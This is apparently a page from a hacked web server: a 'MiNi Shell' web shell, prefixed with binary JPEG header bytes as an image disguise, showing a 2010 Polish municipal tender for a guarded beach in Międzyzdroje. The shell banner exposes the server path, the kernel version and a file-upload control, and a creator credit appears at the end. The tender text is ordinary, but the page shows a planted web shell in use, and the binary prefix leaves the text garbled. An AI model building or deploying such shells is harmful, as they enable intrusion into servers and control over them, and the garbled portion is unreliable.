JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100409/99274-N-2010.html

<p class="kh_header"><b>Międzyzdroje: Urządzenie i prowadzenie miejskiej plaży strzeżonej w   
        Międzyzdrojach, w okresie: od 11 czerwca 2010 r. do 19 września 2010 roku</b><br>
<b>Numer ogłoszenia: 99274 - 2010; data zamieszczenia: 09.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Międzyzdroje , ul. Książąt Pomorskich 5, 72-500 Międzyzdroje, tel. 091 3275652, faks 0913275630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miedzyzdroje.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Urządzenie i prowadzenie miejskiej plaży strzeżonej w   
        Międzyzdrojach, w okresie: od 11 czerwca 2010 r. do 19 września 2010 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest urządzenie i prowadzenie miejskiej plaży strzeżonej w Międzyzdrojach, w okresie: od 11 czerwca 2010 r. do 19 września 2010 roku - zgodnie z przepisami Rozporządzenia Rady Ministrów z dnia 6 maja 1997 roku ( Dz.U. Nr 57, poz. 358 ) wg niżej wymienionych zasad:
     1)  przygotowanie kąpieliska:  
- od dnia 11.06.2010r. do 13.06.2010 r.  
      2)  likwidacja kąpieliska: 
      - od dnia 17.09.2010r. do 19.09.2010r. 
      3) prowadzenie kąpieliska w okresie:  od dnia  14.06.2010r. do 30.06.2010r. i od dnia 01.09.2010r. do 16.09.2010 r., -  na odcinku 400 mb linii brzegowej, po stronie wschodniej ( 1 odcinek - 200m ) i zachodniej ( 1 odcinek 200m ), od Molo, z wyłączeniem  30-to metrowych dwóch pasów plaży,  ( jeden po stronie wschodniej drugi, po stronie zachodniej od Molo  ), gdzie będzie obowiązywał - zakaz kąpieli.
      4) prowadzenie kąpieliska w okresie : od dnia 01 lipca 2010r.  do 31 sierpnia 2010 r., -  na odcinku 1200 mb linii brzegowej, po stronie wschodniej ( 1 odcinek -  600m ) i zachodniej ( 1 odcinek - 600m ), od Molo, z wyłączeniem  30-to metrowych dwóch pasów plaży, ( jeden po stronie wschodniej drugi, po stronie zachodniej od Molo ), gdzie będzie obowiązywał - zakaz kąpieli .
      5) dokładna lokalizacja i długość poszczególnych odcinków plaży strzeżonej, po stronie wschodniej i zachodniej oraz dokładne miejsca rozmieszczenia wież ratowniczych zostaną ustalone bezpośrednio przed rozpoczęciem wykonywania usługi, zgodnie z wymaganiami określonymi w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ.

   	  Na Wykonawcy ciąży obowiązek urządzenia i prowadzenia dwóch wyznaczonych  odcinków plaży strzeżonej - po stronie wschodniej ( 1 odcinek - 200m ) i zachodniej ( 1 odcinek - 200m ), mając za  punkt odniesienia obiekt Molo w Międzyzdrojach, z wyłączeniem 30-to metrowych dwóch pasów plaży, ( jeden po stronie wschodniej drugi po stronie zachodniej od Molo ) gdzie będzie obowiązywał - zakazu kąpieli, w terminach od 14 - 30.06.2010 r. i od 01 - 16.09.2010 r.  - zgodnie z wymogami zawartymi w ( Rozporządzeniu Rady Ministrów z dnia 6 maja 1997 roku ( Dz. U. Nr 57, poz. 358 ) w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne ).  

 	 Na Wykonawcy ciąży obowiązek urządzenia i prowadzenia dwóch wyznaczonych  odcinków plaży strzeżonej - po stronie wschodniej ( 1 odcinek - 600m ) i zachodniej   ( 1 odcinek - 600m ), mając za punkt odniesienia obiekt Molo w Międzyzdrojach, z wyłączeniem 30-to metrowych dwóch pasów plaży, ( jeden po stronie wschodniej drugi po stronie zachodniej, od molo) , gdzie będzie obowiązywał - zakazu kąpieli, w terminach od 01 lipca do 31 sierpnia 2010 r.  - zgodnie z wymogami zawartymi w ( Rozporządzeniu Rady Ministrów z dnia 6 maja 1997 roku ( Dz. U. Nr 57, poz. 358) w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne ).

Realizacja zamówienia zgodnie z obowiązującymi przepisami  zawartymi                         w Rozporządzaniu Rady Ministrów z dnia 6 maja 1997 roku, w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływalniach, kapiących się  i uprawiających sporty wodne, w tym: 
1)	zapewnienie warunków bezpieczeństwa osób pływających, kąpiących się                     i uprawiających sporty wodne  - Rozdział 3  , w tym: 
a.	przygotowanie kąpieliska zorganizowanego - § 7, § 8 ust.2 , 
b.	wykonanie i wywieszenie regulaminów kąpieliska i oznaczenie lokalizacji kąpieliska - § 8 ust. 5, § 9 ust. 1  i ust.2, § 10 ust. 1,2, 3 i 4.
c.	uzyskanie pozytywnych opinii - § 9 ust. 3,
d.	przestrzeganie norm zatrudnienia ratowników - § 15,                                                                     
2)	Przestrzeganie szczegółowych warunków bezpieczeństwa osób korzystających z kąpielisk  i pływalni określa załącznik nr 4 do rozporządzenia - cały zakres, z wyjątkiem  § 7, 
      § 8.1 § 8.2	.
3)	Wyposażenie kąpieliska wg wymogów określonych w załączniku Nr 5 pn. Wzory znaków zakazu, ostrzegawczych i informacyjnych ,
4)	Posiadanie niezbędnego sprzętu, wyszególnionego poniżej, zgodnie z Rozporządzeniem         Rady Ministrów z dnia 6 maja 1997 roku ( Dz.U. Nr 57, poz. 358) w sprawie określenia warunków bezpieczeństwa osób przebywających w górach pływających,  kąpiących się i uprawiających sporty wodne, 
 
Wykonawca jest zobowiązany, do uruchomienia dwóch punktów medycznych jeden od strony morza, drugi od strony lądu oraz zatrudnienia co najmniej jednego ratownika medycznego posiadającego minimum dwuletnie doświadczenie w pracy w jednostkach pomocy doraźnej ( tj. zespół wyjazdowy pogotowia ratunkowego, Lotnicze Pogotowie Ratunkowe, Szpitalny Oddział Ratunkowy). Punkty medyczne muszą być wyposażone w minimum następujący sprzęt : defibrylator ( AED ), zestaw do przyrządowego udrażniania dróg oddechowych, zestaw do prowadzenia tlenoterapii biernej, ssak, worek samorozprężalny wraz z kompletem masek ( dla dzieci i osób dorosłych ), zestaw leków zgodnie z załącznikiem nr 1 do Rozporządzenia  Ministra Zdrowia z dnia 29 grudnia 2008r. w sprawie szczegółowego zakresu medycznych czynności ratunkowych, które mogą być podejmowane przez ratownika medycznego ( Dz. U. z dnia 11 stycznia 2007r. 07.4.33 ), oraz zestaw kołnierzy do unieruchamiania kręgosłupa szyjnego, zestaw szyn Kramera, 3 szt. kocy termicznych, zestaw do opatrywania ran ( bandaże, gaziki, plastry, siatki podtrzymujące itp. ).

Wykonawca ma obowiązek realizowania  programu  Błękitna flaga .

Wykonawca ma obowiązek współpracować z Centrum Koordynacji Ratownictwa w Sopocie ( w ramach programu numer ratunkowy nad wodą 601 100 100 )..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.36.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę, że  w okresie ostatnich 3 lat przed   
             upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest 
             krótszy, w tym okresie, wykonał co najmniej 2 zamówienia tj.  usługi 
             prowadzenia plaży strzeżonej  o wartości nie mniejszej niż 250 000,00 zł  brutto  
             każda, z załączeniem dokumentów potwierdzających,  że usługi te zostały 
             wykonane należycie.    
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o   
       dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje:  
Sprzętem ratowniczym  - Sprzęt na jedną wieżę :

1.	WIEŻA RATOWNICZA 
2.	ZESTAW FLAG 
3.	TABLICE INFORMACYJNE O POMIARACH 
4.	OZNAKOWANIE KĄPIELISKA - BOJE, BALASTY  
                             ( ILOŚĆ WG NORM I POTRZEB ) 
5.	OZNAKOWANIE INDYWIDUALNE RATOWNIKA ( CZAPECZKA       
KOSZULKA, SZORTY )
6.	WYPOSAŻENIE OSOBISTE - BAYWATCH 3 SZT. 
7.	SPRZĘT MEDYCZNY : ZESTAW REANIMACYJNY Z HOMOLOGACJĄ, APTECZKA, ŚRODKI OPATRUNKOWE, NOSZE, KOŁNIERZ ORTOPEDYCZNY, TERMOMETR
8.	LINY ASEKURACYJNE Z KOŁOWROTEM O DŁ. MINIMUM 80M NA KAŻDYM STANOWISKU RATOWNICZYM ( JEDNA NA KAŻDE 100M LINII BRZEGOWEJ )
9.	KOŁA RATUNKOWE Z LINKĄ LUB PASY RATUNKOWE -  JEDNO NA 50 M LINII BRZEGOWEJ ZAWIESZONE NA SŁUPKACH W POBLIŻU LUSTRA WODY 
10.	RZUTKA RATUNKOWA
11.	KOCE SZT.2 
12.	BOSAKI RATUNKOWE 2 SZT
13.	LORNETKA
14.	ŚRODKI ŁĄCZNOŚCI 
15.	SPRZĘT DO NURKOWANIA ABC
16.	TUBA ELEKTROAKUSTYCZNA 1 SZT 
17.	ŁÓDŹ WIOSŁOWA ( Z WYPOSAZENIEM ZGODNYM Z NORMĄ ) JEDNA NA KAŻDE 100 M LINII BRZEGOWEJ 

Ponadto:  
1.	ŁÓDŹ MOTOROWA 1 SZT. NA KAŻDE 400 M LINII BRZEGOWEJ, W TYM  1 PŁYWAJACA JEDNOSTKA MUSI POSIADAĆ KARTĘ BEZPIECZEŃSTWA I BYĆ ZDOLNĄ PORUSZAĆ SIĘ W STREFIE PRZYBRZEŻNEJ PRZY SILE WIATRU RÓWNEJ CO NAJMNIEJ 6 B, ORAZ POSIADAĆ ZAŁOGĘ Z UPRAWNIENIAMI. ( MIN. STARSZY STERNIK ). 
2.	SPRZĘT MEDYCZNY: SZYNY KRAMERA, ŚRODKI OPATRUNKOWE I MEDYCZNE - ( ZGODNIE Z  ZAŁĄCZNIKIEM NR  6  WW. ROZPORZĄDZENIA )
3.	TABLICE; POCZĄTEK I KONIEC PLAŻY 

                                Punkty medyczne - wyposażenie  : 
minimum następujący sprzęt : 
defibrylator ( AED ), zestaw do przyrządowego udrażniania dróg oddechowych, zestaw do prowadzenia tlenoterapii biernej, ssak, worek samorozprężalny wraz z kompletem masek ( dla dzieci i osób dorosłych ), zestaw leków zgodnie z załącznikiem nr 1 do Rozporządzenia  Ministra Zdrowia z dnia 29 grudnia 2008r. w sprawie szczegółowego zakresu medycznych czynności ratunkowych, które mogą być podejmowane przez ratownika medycznego ( Dz. U. z dnia 11 stycznia 2007r. 07.4.33 ), oraz zestaw kołnierzy do unieruchamiania kręgosłupa szyjnego, zestaw szyn Kramera, 3 szt. kocy termicznych, zestaw do opatrywania ran ( bandaże, gaziki, plastry, siatki podtrzymujące itp. ).

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o   
       dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje potencjałem kadrowym: 
	co najmniej  jedną osobą z uprawnieniami Starszego Ratownika 
	co najmniej  jedną osobą z uprawnieniami Sternika Motorowodnego 
	co najmniej jedną osobą z uprawnieniami Starszego Sternika Motorowodnego
	co najmniej jedną osobą z uprawnieniami Ratownika Medycznego 
	co najmniej jednym  ratownikiem medycznym posiadającym minimum dwuletnie doświadczenie w pracy w jednostkach pomocy doraźnej ( tj. zespół wyjazdowy pogotowia ratunkowego, Lotnicze Pogotowie Ratunkowe, Szpitalny Oddział Ratunkowy).
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o   
       dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że
                wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie   
                prowadzonej działalności o wartości minimum 100 000, 00 zł na każde zdarzenie 
               (NW).  Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o   
       dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli 
                   odrębne przepisy wymagają zgłoszenia do ewidencji działalności gospodarczej 
                   wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania 
                   ofert 
                   lub 
                   uprawnienia wydane na podstawie  § 6.1 Rozporządzenia Ministra Spraw 
                   Wewnętrznych i Administracji z dnia 12 listopada 2002 roku w sprawie  
                   szczegółowego zakresu obowiązków i uprawnień specjalistycznych organizacji 
                   ratowniczych, warunków ich wykonywania przez inne organizacje ratownicze 
                   oraz rodzaju i wysokości świadczeń przysługujących ratownikom górskim i 
                   wodnym w związku z udziałem w akcji ratowniczej ( Dz.U. z 2002r. Nr 193, 
                   poz.1624 )
                   lub
                  Uprawnienia   zgodnie z § 7.1 Rozporządzenia Rady Ministrów z dnia 6 maja 
                  1997 roku w sprawie określenia warunków bezpieczeństwa osób 
                   przebywających w górach, pływalniach, kąpiących się i uprawiających sporty 
                   wodne  ( Dz. U. Nr 57 poz. 358)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzyzdroje.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Międzyzdroje ulica Książąt Pomorskich 5 72-400 Międzyzdroje.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2010 godzina 10:00, miejsce: w siedzibie zamawiającego 
                 Gmina Międzyzdroje 
                 Ulica Książąt Pomorskich 5 
                 72 -500 Międzyzdroje 
                  Pokój nr 10 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com